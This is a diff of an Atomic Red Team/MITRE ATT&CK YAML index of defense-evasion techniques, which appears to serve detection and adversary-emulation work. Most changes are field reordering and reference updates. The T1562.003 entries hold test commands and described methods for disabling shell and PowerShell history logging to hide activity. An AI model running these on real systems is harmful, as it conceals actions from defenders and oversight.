https://attack.mitre.org/techniques/T1562/007 - source_name: Expel IO Evil in AWS url: https://expel.io/blog/finding-evil-in-aws/ - description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April - 28). Finding Evil in AWS. Retrieved June 25, 2020. + description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding + Evil in AWS. Retrieved June 25, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -24655,7 +28420,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-07T13:49:05.345Z' + modified: '2020-09-14T20:02:24.426Z' created: '2020-06-24T16:55:46.243Z' x_mitre_contributors: - Expel @@ -25398,31 +29163,13 @@ defense-evasion: elevation_required: true T1078.002: technique: - created: '2020-03-13T20:21:54.758Z' - modified: '2020-03-23T21:08:40.063Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - type: attack-pattern - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - name: Domain Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.002 url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html - url: https://technet.microsoft.com/en-us/library/dn535501.aspx description: Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. @@ -25435,22 +29182,43 @@ defense-evasion: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Authentication logs - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator x_mitre_detection: |- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - Authentication logs + - Process monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1556.001: technique: @@ -25470,11 +29238,11 @@ defense-evasion: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Domain Controller Authentication - description: "Adversaries may patch the authentication process on a domain control + description: "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication - process on a domain control with the intent of creating a backdoor used to - access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). + process on a domain controller with the intent of creating a backdoor used + to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password @@ -25489,7 +29257,7 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-25T20:51:30.829Z' + modified: '2020-08-26T14:16:48.125Z' created: '2020-02-11T19:05:02.399Z' x_mitre_data_sources: - Authentication logs @@ -25516,6 +29284,59 @@ defense-evasion: x_mitre_platforms: - Windows atomic_tests: [] + T1601.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1601.002 + url: https://attack.mitre.org/techniques/T1601/002 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Downgrade System Image + description: "Adversaries may install an older version of the operating system + of a network device to weaken security. Older operating system versions on + network devices often have weaker encryption ciphers and, in general, fewer/less + updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn + embedded devices, downgrading the version typically only requires replacing + the operating system file in storage. With most embedded devices, this can + be achieved by downloading a copy of the desired version of the operating + system file and reconfiguring the device to boot from that file on next system + restart. The adversary could then restart the device to implement the change + immediately or they could wait until the next time the system restarts.\n\nDowngrading + the system image to an older versions may allow an adversary to evade defenses + by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). + \ Downgrading of a system image can be done on its own, or it can be used + in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). + \ " + id: attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-22T17:49:02.660Z' + created: '2020-10-19T19:53:10.576Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Many embedded network devices provide a command to print + the version of the currently running operating system. Use this command to + query the operating system for its version number and compare it to what is + expected for the device in question. Because image downgrade may be used + in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), + it may be appropriate to also verify the integrity of the vendor provided + operating system image file. ' + x_mitre_data_sources: + - Network device configuration + - File monitoring + x_mitre_platforms: + - Network + atomic_tests: [] T1574.004: technique: id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 @@ -25533,9 +29354,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1574.004 url: https://attack.mitre.org/techniques/T1574/004 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-471 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/471.html - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. @@ -25552,7 +29373,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:06:47.115Z' + modified: '2020-09-16T16:48:09.391Z' created: '2020-03-16T15:23:30.896Z' x_mitre_platforms: - macOS @@ -25573,7 +29394,31 @@ defense-evasion: atomic_tests: [] T1055.001: technique: - id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + created: '2020-01-14T01:26:08.145Z' + modified: '2020-06-20T22:17:59.148Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1055.001 + url: https://attack.mitre.org/techniques/T1055/001 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Endgame Process Injection July 2017 + - url: https://www.endgame.com/blog/technical-blog/hunting-memory + description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December + 7, 2017. + source_name: Endgame HuntingNMemory June 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Dynamic-link Library Injection description: "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space @@ -25593,35 +29438,17 @@ defense-evasion: to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. " - name: Dynamic-link Library Injection - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1055.001 - url: https://attack.mitre.org/techniques/T1055/001 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.endgame.com/blog/technical-blog/hunting-memory - description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December - 7, 2017. - source_name: Endgame HuntingNMemory June 2017 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:17:59.148Z' - created: '2020-01-14T01:26:08.145Z' - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - Process monitoring + - DLL monitoring + - File monitoring + - API monitoring + x_mitre_permissions_required: + - User x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -25636,16 +29463,10 @@ defense-evasion: if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_permissions_required: - - User - x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring - - API monitoring - x_mitre_defense_bypassed: - - Application control - - Anti-virus + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows atomic_tests: [] T1548.004: technique: @@ -25825,7 +29646,7 @@ defense-evasion: Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 type: attack-pattern kill_chain_phases: @@ -26353,12 +30174,6 @@ defense-evasion: name: powershell T1222: technique: - created: '2018-10-17T00:14:20.652Z' - modified: '2020-03-29T23:12:40.212Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: File and Directory Permissions Modification @@ -26384,6 +30199,12 @@ defense-evasion: source_name: EventTracker File Permissions Feb 2014 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-01T20:05:05.562Z' + created: '2018-10-17T00:14:20.652Z' x_mitre_is_subtechnique: false x_mitre_permissions_required: - User @@ -26611,88 +30432,6 @@ defense-evasion: x_mitre_platforms: - Windows atomic_tests: [] - T1562.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1562.003 - url: https://attack.mitre.org/techniques/T1562/003 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: HISTCONTROL - description: |- - Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. - - This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. - - Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. - id: attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-29T22:09:18.020Z' - created: '2020-02-21T20:56:06.498Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_defense_bypassed: - - Host forensic analysis - - Log analysis - x_mitre_detection: Correlating a user session with a distinct lack of new commands - in their .bash_history can be a clue to suspicious behavior. - Additionally, users checking or changing their HISTCONTROL environment - variable is also suspicious. - x_mitre_data_sources: - - Environment variable - - File monitoring - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1562.003 - atomic_tests: - - name: Disable history collection - auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 - description: 'Disables history collection in shells - -' - supported_platforms: - - linux - - macos - input_arguments: - evil_command: - description: Command to run after shell history collection is disabled - type: String - default: whoami - executor: - command: | - export HISTCONTROL=ignoreboth - #{evil_command} - name: sh - - name: Mac HISTCONTROL - auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d - description: "The HISTCONTROL variable is set to ignore (not write to the history - file) command that are a duplicate of something already in the history \nand - commands that start with a space. This atomic sets this variable in the current - session and also writes it to the current user's ~/.bash_profile \nso that - it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n" - supported_platforms: - - macos - - linux - executor: - steps: | - 1. export HISTCONTROL=ignoreboth - 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile - 3. ls - 4. whoami > recon.txt - name: manual T1564.005: technique: external_references: @@ -26754,25 +30493,6 @@ defense-evasion: atomic_tests: [] T1564.001: technique: - created: '2020-02-26T17:46:13.128Z' - modified: '2020-03-29T22:32:25.985Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d - description: |- - Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS). - - On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. - - Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys. - - Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files. - name: Hidden Files and Directories - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1564.001 @@ -26789,23 +30509,42 @@ defense-evasion: description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.' source_name: WireLurker - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_detection: Monitor the file system and shell commands for files being - created with a leading "." and the Windows command-line use of attrib.exe - to add the hidden attribute. - x_mitre_permissions_required: - - User + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hidden Files and Directories + description: |- + Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS). + + On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. + + Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys. + + Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files. + id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-29T22:32:25.985Z' + created: '2020-02-26T17:46:13.128Z' + x_mitre_defense_bypassed: + - Host forensic analysis x_mitre_data_sources: - Process command-line parameters - Process monitoring - File monitoring - x_mitre_defense_bypassed: - - Host forensic analysis + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor the file system and shell commands for files being + created with a leading "." and the Windows command-line use of attrib.exe + to add the hidden attribute. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + - macOS + - Linux identifier: T1564.001 atomic_tests: - name: Create a hidden file in a hidden directory @@ -26954,9 +30693,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1564.002 url: https://attack.mitre.org/techniques/T1564/002 - - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty + - url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved - July 8, 2017. + July 31, 2020. source_name: Cybereason OSX Pirrit object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 @@ -26971,7 +30710,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-29T22:36:25.994Z' + modified: '2020-07-31T17:42:43.768Z' created: '2020-03-13T20:12:40.876Z' x_mitre_data_sources: - File monitoring @@ -27114,15 +30853,6 @@ defense-evasion: name: powershell T1564: technique: - id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8 - description: |- - Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) - - Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) - name: Hide Artifacts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1564 @@ -27131,9 +30861,9 @@ defense-evasion: description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. source_name: Sofacy Komplex Trojan - - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty + - url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved - July 8, 2017. + July 31, 2020. source_name: Cybereason OSX Pirrit - url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. @@ -27143,22 +30873,21 @@ defense-evasion: url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hide Artifacts + description: |- + Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) + + Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) + id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-06T19:03:40.511Z' + modified: '2020-09-23T11:31:50.636Z' created: '2020-02-26T17:41:25.933Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_detection: Monitor files, processes, and command-line arguments for - actions indicative of hidden artifacts. Monitor event and authentication logs - for records of hidden artifacts being used. Monitor the file system and shell - commands for hidden attribute usage. x_mitre_data_sources: - API monitoring - PowerShell logs @@ -27166,6 +30895,16 @@ defense-evasion: - Process command-line parameters - Process monitoring - File monitoring + x_mitre_detection: Monitor files, processes, and command-line arguments for + actions indicative of hidden artifacts. Monitor event and authentication logs + for records of hidden artifacts being used. Monitor the file system and shell + commands for hidden attribute usage. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1574: technique: @@ -27194,7 +30933,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-26T16:09:59.324Z' + modified: '2020-10-17T15:15:28.288Z' created: '2020-03-12T20:38:12.465Z' x_mitre_data_sources: - Environment variable @@ -27225,6 +30964,134 @@ defense-evasion: - macOS - Windows atomic_tests: [] + T1562.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1562.003 + url: https://attack.mitre.org/techniques/T1562/003 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - source_name: Microsoft PowerShell Command History + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 + description: Microsoft. (2020, May 13). About History. Retrieved September + 4, 2020. + - source_name: Sophos PowerShell command audit + url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit + description: jak. (2020, June 27). Live Discover - PowerShell command audit. + Retrieved August 21, 2020. + - source_name: Sophos PowerShell Command History Forensics + url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics + description: Vikas, S. (2020, August 26). PowerShell Command History Forensics. + Retrieved September 4, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Impair Command History Logging + description: "Adversaries may impair command history logging to hide commands + they run on a compromised system. Various command interpreters keep track + of the commands users type in their terminal so that users can retrace what + they've done. \n\nOn Linux and macOS, command history is tracked in a file + pointed to by the environment variable HISTFILE. When a user + logs off a system, this information is flushed to a file in the user's home + directory called ~/.bash_history. The HISTCONTROL + environment variable keeps track of what should be saved by the history + command and eventually into the ~/.bash_history file when a user + logs out. HISTCONTROL does not exist by default on macOS, but + can be set by the user and will be respected.\n\nAdversaries may clear the + history environment variable (unset HISTFILE) or set the command + history size to zero (export HISTFILESIZE=0) to prevent logging + of commands. Additionally, HISTCONTROL can be configured to ignore + commands that start with a space by simply setting it to \"ignorespace\". + HISTCONTROL can also be set to ignore duplicate commands by setting + it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" + which covers both of the previous examples. This means that “ ls” will not + be saved, but “ls” would be saved by history. Adversaries can abuse this to + operate without leaving traces by simply prepending a space to all of their + terminal commands.\n\nOn Windows systems, the PSReadLine module + tracks commands used in all PowerShell sessions and writes them to a file + ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt + by default). Adversaries may change where these logs are saved using Set-PSReadLineOption + -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt + to stop receiving logs. Additionally, it is possible to turn off logging to + this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle + SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: + Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History + Forensics)" + id: attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-16T18:25:12.727Z' + created: '2020-02-21T20:56:06.498Z' + x_mitre_contributors: + - Vikas Singh, Sophos + - Emile Kenning, Sophos + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_defense_bypassed: + - Host forensic analysis + - Log analysis + x_mitre_detection: "Correlating a user session with a distinct lack of new commands + in their .bash_history can be a clue to suspicious behavior. + Additionally, users checking or changing their HISTCONTROL, HISTFILE, + or HISTFILESIZE environment variables may be suspicious.\n\nMonitor + for modification of PowerShell command history settings through processes + being created with -HistorySaveStyle SaveNothing command-line + arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle + SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. " + x_mitre_data_sources: + - PowerShell logs + - Process command-line parameters + - Environment variable + - File monitoring + - Authentication logs + - Process monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows + identifier: T1562.003 + atomic_tests: + - name: Disable history collection + auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 + description: 'Disables history collection in shells + +' + supported_platforms: + - linux + - macos + input_arguments: + 